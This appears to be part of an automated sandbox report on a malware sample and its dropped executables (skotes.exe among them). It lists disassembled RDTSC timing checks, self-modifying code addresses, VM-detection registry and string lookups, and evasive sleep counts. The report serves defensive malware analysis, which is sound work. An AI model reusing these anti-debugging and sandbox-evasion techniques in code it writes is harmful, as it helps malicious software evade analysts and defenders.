Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E077B second address: 49E07DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F8A2CE89CA6h 0x0000000d push eax 0x0000000e jmp 00007F8A2CE89C9Bh 0x00000013 nop 0x00000014 jmp 00007F8A2CE89CA6h 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c pushad 0x0000001d mov bx, 5CE0h 0x00000021 popad 0x00000022 mov dword ptr fs:[00000000h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F8A2CE89CA2h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E07DF second address: 49E0823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov edx, 6A4ECB40h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+08h] 0x00000010 jmp 00007F8A2D3CFEDFh 0x00000015 mov eax, dword ptr [esi+10h] 0x00000018 pushad 0x00000019 jmp 00007F8A2D3CFEE4h 0x0000001e movzx esi, di 0x00000021 popad 0x00000022 test eax, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0823 second address: 49E0828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0828 second address: 49E082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E082E second address: 49E0832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0832 second address: 49E085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F8A9FE0F3B5h 0x00000011 pushad 0x00000012 mov cl, CEh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8A2D3CFEDFh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E085F second address: 49E08BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub eax, eax 0x00000009 jmp 00007F8A2CE89CA5h 0x0000000e mov dword ptr [ebp-20h], eax 0x00000011 jmp 00007F8A2CE89C9Eh 0x00000016 mov ebx, dword ptr [esi] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F8A2CE89CA8h 0x00000021 add ax, 5638h 0x00000026 jmp 00007F8A2CE89C9Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E08BE second address: 49E0903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8A2D3CFEDCh 0x00000013 and eax, 79A30FC8h 0x00000019 jmp 00007F8A2D3CFEDBh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 movzx eax, di 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0E90 second address: 49D0EA0 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0EA0 second address: 49D0EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, ax 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: DEF2E1 second address: DEEB9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D1BA3h], edi 0x00000011 jns 00007F8A2CE89C9Ch 0x00000017 push dword ptr [ebp+122D1689h] 0x0000001d pushad 0x0000001e pushad 0x0000001f xor di, F5C3h 0x00000024 popad 0x00000025 jmp 00007F8A2CE89C9Eh 0x0000002a popad 0x0000002b call dword ptr [ebp+122D2E49h] 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D199Fh], eax 0x00000038 xor eax, eax 0x0000003a jmp 00007F8A2CE89C9Bh 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 jno 00007F8A2CE89CA4h 0x00000049 mov dword ptr [ebp+122D3A97h], eax 0x0000004f jmp 00007F8A2CE89CA4h 0x00000054 mov esi, 0000003Ch 0x00000059 stc 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jmp 00007F8A2CE89CA3h 0x00000063 lodsw 0x00000065 add dword ptr [ebp+122D199Fh], edi 0x0000006b mov dword ptr [ebp+122D199Fh], edi 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 sub dword ptr [ebp+122D199Fh], eax 0x0000007b jmp 00007F8A2CE89C9Ch 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jg 00007F8A2CE89CAEh 0x0000008a jmp 00007F8A2CE89CA8h 0x0000008f push eax 0x00000090 push eax 0x00000091 push edx 0x00000092 push ecx 0x00000093 js 00007F8A2CE89C96h 0x00000099 pop ecx 0x0000009a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F73493 second address: F734AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8A2D3CFEE2h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F734AD second address: F734C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8A2CE89C96h 0x0000000a jmp 00007F8A2CE89C9Ah 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F734C1 second address: F734CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F734CA second address: F73506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8A2CE89C96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8A2CE89CA9h 0x00000014 jmp 00007F8A2CE89CA4h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F73506 second address: F73554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2D3CFEE3h 0x00000008 jmp 00007F8A2D3CFEE7h 0x0000000d jmp 00007F8A2D3CFEE4h 0x00000012 je 00007F8A2D3CFED6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F5FD79 second address: F5FD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F8A2CE89C96h 0x0000000f pop eax 0x00000010 jmp 00007F8A2CE89CA1h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F72B26 second address: F72B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F72B2A second address: F72B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74849 second address: DEEB9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F8A2D3CFEDEh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov esi, ecx 0x00000019 push dword ptr [ebp+122D1689h] 0x0000001f movsx ecx, si 0x00000022 call dword ptr [ebp+122D2E49h] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D199Fh], eax 0x0000002f xor eax, eax 0x00000031 jmp 00007F8A2D3CFEDBh 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jno 00007F8A2D3CFEE4h 0x00000040 mov dword ptr [ebp+122D3A97h], eax 0x00000046 jmp 00007F8A2D3CFEE4h 0x0000004b mov esi, 0000003Ch 0x00000050 stc 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 jmp 00007F8A2D3CFEE3h 0x0000005a lodsw 0x0000005c add dword ptr [ebp+122D199Fh], edi 0x00000062 mov dword ptr [ebp+122D199Fh], edi 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c sub dword ptr [ebp+122D199Fh], eax 0x00000072 jmp 00007F8A2D3CFEDCh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b jg 00007F8A2D3CFEEEh 0x00000081 jmp 00007F8A2D3CFEE8h 0x00000086 push eax 0x00000087 push eax 0x00000088 push edx 0x00000089 push ecx 0x0000008a js 00007F8A2D3CFED6h 0x00000090 pop ecx 0x00000091 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F748AB second address: F748B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F748B0 second address: F748B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F748B6 second address: F7493C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007F8A2CE89CA4h 0x00000010 jmp 00007F8A2CE89CA4h 0x00000015 popad 0x00000016 nop 0x00000017 movzx edi, di 0x0000001a push 00000000h 0x0000001c sub edi, dword ptr [ebp+122D3883h] 0x00000022 call 00007F8A2CE89C99h 0x00000027 jmp 00007F8A2CE89CA3h 0x0000002c push eax 0x0000002d push eax 0x0000002e push ecx 0x0000002f pushad 0x00000030 popad 0x00000031 pop ecx 0x00000032 pop eax 0x00000033 mov eax, dword ptr [esp+04h] 0x00000037 push esi 0x00000038 jmp 00007F8A2CE89CA8h 0x0000003d pop esi 0x0000003e mov eax, dword ptr [eax] 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F7493C second address: F7494D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74A50 second address: F74ABD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8A2CE89C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+122D1F98h], edi 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 mov edx, dword ptr [ebp+122D3A0Fh] 0x0000001d pop edx 0x0000001e call 00007F8A2CE89C99h 0x00000023 jmp 00007F8A2CE89CA9h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edi 0x0000002b jmp 00007F8A2CE89CA3h 0x00000030 pop edi 0x00000031 pop edx 0x00000032 mov eax, dword ptr [esp+04h] 0x00000036 push esi 0x00000037 jc 00007F8A2CE89C98h 0x0000003d push edx 0x0000003e pop edx 0x0000003f pop esi 0x00000040 mov eax, dword ptr [eax] 0x00000042 push eax 0x00000043 push edx 0x00000044 push ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74ABD second address: F74AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74AC2 second address: F74ADC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8A2CE89C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jng 00007F8A2CE89CA8h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74ADC second address: F74AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74AE0 second address: F74AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74AE4 second address: F74B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 mov dword ptr [ebp+122D1F42h], esi 0x0000000e push ebx 0x0000000f mov dword ptr [ebp+122D1B08h], ebx 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 xor ebx, 0FC731FEh 0x0000001e mov si, D058h 0x00000022 popad 0x00000023 push 00000003h 0x00000025 mov dword ptr [ebp+122D1BD8h], ebx 0x0000002b push 00000000h 0x0000002d cld 0x0000002e push 00000003h 0x00000030 mov dword ptr [ebp+122D185Bh], edi 0x00000036 mov ecx, ebx 0x00000038 push 6E10E811h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F8A2D3CFEE7h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74B3A second address: F74B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74B3F second address: F74B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74B45 second address: F74B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 51EF17EFh 0x0000000e mov ecx, dword ptr [ebp+122D2857h] 0x00000014 lea ebx, dword ptr [ebp+1245973Fh] 0x0000001a sbb ecx, 01096DCBh 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 jg 00007F8A2CE89C96h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74B73 second address: F74B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F8A2D3CFEE3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74C9F second address: F74CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74CA3 second address: F74CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74CA9 second address: F74CF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 598B1615h 0x0000000f and edi, dword ptr [ebp+122D388Bh] 0x00000015 lea ebx, dword ptr [ebp+1245974Ah] 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F8A2CE89C98h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 push eax 0x00000036 js 00007F8A2CE89CA4h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: F74CF2 second address: F74CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 69EB1D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 69EC19 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 84C4BE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8D4F61 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: DEEB1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: DEEC19 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F9C4BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1024F61 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Special instruction interceptor: First address: FE17E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Special instruction interceptor: First address: FDF39E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Special instruction interceptor: First address: 11B2855 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Special instruction interceptor: First address: FE16EC instructions caused by: Self-modifying code
Source: C:\Users\user\1000026002\cee706a53f.exe Special instruction interceptor: First address: 9B17E2 instructions caused by: Self-modifying code
Source: C:\Users\user\1000026002\cee706a53f.exe Special instruction interceptor: First address: 9AF39E instructions caused by: Self-modifying code
Source: C:\Users\user\1000026002\cee706a53f.exe Special instruction interceptor: First address: B82855 instructions caused by: Self-modifying code
Source: C:\Users\user\1000026002\cee706a53f.exe Special instruction interceptor: First address: 9B16EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 6617E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 65F39E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 832855 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 6616EC instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\1000026002\cee706a53f.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\1000026002\cee706a53f.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\1000026002\cee706a53f.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A306C1 rdtsc 0_2_04A306C1
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 385 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1793 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1085 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2135 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1526 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 858 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2655
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 888
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2916 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2916 Thread sleep time: -122061s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3984 Thread sleep count: 58 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3984 Thread sleep time: -116058s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2500 Thread sleep count: 385 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2500 Thread sleep time: -11550000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2772 Thread sleep count: 68 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2772 Thread sleep time: -136068s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3688 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4824 Thread sleep count: 1793 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4824 Thread sleep time: -3587793s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3700 Thread sleep count: 1085 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3700 Thread sleep time: -2171085s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4824 Thread sleep count: 2135 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4824 Thread sleep time: -4272135s >= -30000s Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe TID: 4080 Thread sleep time: -96000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1836 Thread sleep count: 102 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1836 Thread sleep time: -612000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1612 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\1000026002\cee706a53f.exe TID: 1536 Thread sleep time: -108000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe TID: 7936 Thread sleep count: 137 > 30
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe TID: 7936 Thread sleep time: -822000s >= -30000s
Source: C:\Users\user\1000026002\cee706a53f.exe TID: 3148 Thread sleep time: -156000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: 8a145ab7b3.exe, skotes.exe, cee706a53f.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000008.00000002.2697000883.0000000001418000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW2r0
